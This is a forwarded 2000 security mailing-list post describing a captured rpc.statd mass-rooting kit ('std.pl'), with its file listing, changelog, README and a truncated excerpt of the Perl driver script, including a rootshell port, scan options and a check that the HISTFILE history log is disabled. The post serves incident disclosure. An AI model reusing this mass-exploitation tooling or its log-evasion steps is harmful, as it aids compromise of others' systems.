subject: (Fwd) More info regarding: std.pl, the rpc.statd linux mass ro
posted: Mon, 18 Dec 2000 20:04:37 -0000



------- Forwarded message follows -------
Date sent: Fri, 15 Dec 2000 09:36:44 -0600
Send reply to: marc <[email protected]>
From: marc <[email protected]>
Subject: More info regarding: std.pl, the rpc.statd linux mass rooter
To: [email protected]

I've heard different things from a lot of people about this. I do not
feel comfortable posting the script itself, but I will post some
additional information about it.

The perl script does not look like an amatuer job, it has some good coding
and error checking. And it worked well at finding and compromising boxes,
there were quite a few logged when we found it.

I will take the full script and send it to CERT, who has requested a copy,
but I do not plan to distribute it to anyone else.

-rw-rw-r-- 1 marc marc 19 Nov 29 02:36 .config
-rw-rw-r-- 1 marc marc 105 Nov 30 01:29 207.92.root
-r-------- 1 marc marc 430 Oct 30 01:33 CHANGES
-r-------- 1 marc marc 107 Oct 22 02:26 README
-r-x------ 1 marc marc 320 Oct 13 22:23 config
-r-x------ 1 marc marc 15457 Oct 13 18:33 no
-r-x------ 1 marc marc 7273 Aug 7 21:46 pc
-rwxr-xr-x 1 marc marc 19438 Oct 14 00:36 st
-rwxrwx--- 1 marc marc 6171 Oct 30 01:32 std.pl

207.92.root: ASCII text
CHANGES: English text
README: English text
config: Bourne shell script text
no: ELF 32-bit LSB executable, Intel 80386, version 1,
dynamically linked (uses shared libs), not stripped
pc: ELF 32-bit LSB executable, Intel 80386, version 1,
dynamically linked (uses shared libs), not stripped
st: ELF 32-bit LSB executable, Intel 80386, version 1,
dynamically linked (uses shared libs), not stripped
std.pl: perl commands text

pc is the port scanner. The script has it search for only port 111.
no is a notify daemon. (?)
st is the exploit to root the box and leave the rootshell.
std.pl is the perl script that runs the show.

::::::::::::::
CHANGES
::::::::::::::
Change log

0.2 -> 0.2+p1:
- multiple copies can run on one server now
- cleaned up the script, converted most system() commands into real perl
- added signal handler
- made more verbose errors
- auto random scans now reloops through the file, doesn't spawn children
of the script anymore

0.2+p1 -> 0.2+p2:
- fixed a big prob in +p1 that made the script not work

0.2+p2 -> 0.2+p3:
- fixed a minor prob, nothing worth mentioning
::::::::::::::
README
::::::::::::::
Before using std.pl you must run ./config to set required values
or the script will not function properly.

::::::::::::::
std.pl
::::::::::::::
#!/usr/bin/perl
#
# std.pl v0.2+p3 by KraZee - 10.30.00 private
# rpc.statd linux mass rooter [epic]
#
# binds rootshell on port 24765 on exploited hosts
# standard disclaimers apply
#
# DO NOT DISTRIBUTE !! DO NOT DISTRIBUTE

$numofargs=@ARGV;
$option=@ARGV[0];
$prefix=@ARGV[1];
$auto=@ARGV[2];
use File::Basename;
$progname=basename($0);
$SIG{INT}=\&catch_sig;
$hist=$ENV{HISTFILE};
$histlength=length($hist);

print "\nstd.pl v0.2+p3 private - by KraZee\nrpc.statd linux mass
rooter\n\n";

if ($histlength != "0" && $hist ne "/dev/null") {
print "naughty boy you forgot to redirect HISTFILE\n\n";
}

if (not -e ".config") {
print "* error: configuration not set, run ./config\n\n";
exit;
} else {
unless(open (CONFIG, "< .config")) { &cleanup; die "* error, unable to
read configuration: $!\n\n"; }
$config="";
$config=;
chop $config;
($ip, $childs)=split(" ", $config);
close(CONFIG);
if ($ip eq "" || $childs == "") {

...

sub help {
print "usage: $progname \n\n";
print "configuration:\n";
print "server: $ip childs: $childs\n\n";
print "options:\n";
print "-s scan class b/c subnet\n";
print "-f scan ips in ip database (no hostnames!)\n";
print "-r scan random class b's (specify class a)\n";
print "use '-r auto' to loop new scans\n\n";
}


------- End of forwarded message -------

generated by msg2page 0.06 on Jul 21, 2006 at 19:04:56

 search: